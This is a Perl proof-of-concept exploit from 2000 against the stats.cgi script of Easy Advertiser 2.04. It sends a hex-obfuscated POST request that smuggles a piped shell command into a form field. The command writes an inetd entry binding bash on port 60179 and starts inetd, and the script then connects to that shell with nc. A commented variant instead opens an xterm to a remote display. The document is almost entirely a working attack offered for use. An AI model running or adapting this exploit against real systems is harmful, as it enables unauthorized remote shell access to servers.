#!/usr/bin/perl -w ## Easy Advertiser v. 2.04 / (c) 1999 Smokey ## Communications, LLC - PoC exploit. ## http://www.smokey.net/ ## ## Exploits an insecure open() in that stats.cgi ## script. The exploit will attempt to bind a ## shell with nobody/99 privileges on port 60179 ## This will not work if the $target does not ## have inetd installed. I have included the code ## to simply spawn an xterm as well. ## ## [ Wed Oct 4 16:53:05 CEST 2000 ] ## ## http://teleh0r.cjb.net/ || teleh0r@doglover.com use strict; use Socket; if (@ARGV < 1) { print("Usage: $0 \n"); exit(1); } my($target, $length, $cgicode, $agent, $sploit, $iaddr, $paddr, $proto); $target = $ARGV[0]; print("\nRemote host: $target\n"); print("CGI-script: /cgi-bin/stats.cgi\n"); $agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)"; $cgicode = # echo 'fido stream tcp nowait nobody /bin/bash bash -i' > /tmp/.hass; # /usr/sbin/inetd /tmp/.hass # stats.cgi port binding cgicode (port fido/60179) "\x73\x74\x61\x74\x73\x3d\x73\x74\x61\x74\x73\x26\x6e". "\x61\x6d\x65\x3d\x74\x65\x6c\x65\x68\x30\x72\x26\x61". "\x64\x73\x6e\x3d\x7c\x65\x63\x68\x6f\x2b\x27\x66\x69". "\x64\x6f\x2b\x73\x74\x72\x65\x61\x6d\x2b\x74\x63\x70". "\x2b\x6e\x6f\x77\x61\x69\x74\x2b\x6e\x6f\x62\x6f\x64". "\x79\x2b\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x2b\x62". "\x61\x73\x68\x2b\x2d\x69\x27\x2b\x3e\x2b\x2f\x74\x6d". "\x70\x2f\x2e\x68\x61\x73\x73\x3b\x2f\x75\x73\x72\x2f". "\x73\x62\x69\x6e\x2f\x69\x6e\x65\x74\x64\x2b\x2f\x74". "\x6d\x70\x2f\x2e\x68\x61\x73\x73\x7c\x26\x6c\x6f\x67". "\x69\x6e\x3d\x4c\x6f\x67\x69\x6e"; # To spawn an xterm instead: # "stats=stats&name=teleh0r&adsn=%7Cxterm+-ut+-display+". # "target.com "%3A0%7C&login=Login"; $sploit = "POST /cgi-bin/stats.cgi HTTP/1.0 Connection: close User-Agent: $agent Host: $target Content-type: application/x-www-form-urlencoded Content-length: 168 $cgicode"; $iaddr = inet_aton($target) || die("Error: $!\n"); $paddr = sockaddr_in(80, $iaddr) || die("Error: $!\n"); $proto = getprotobyname('tcp') || die("Error: $!\n"); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); connect(SOCKET, $paddr) || die("Error: $!\n"); send(SOCKET,"$sploit\015\012", 0) || die("Error: $!\n"); close(SOCKET); print("\nSleeping 5 seconds - waiting for the shell ...\n\n"); sleep(5); system("nc -w 10 $target 60179"); exit(0); # www.hack.co.za [12 October 2000]#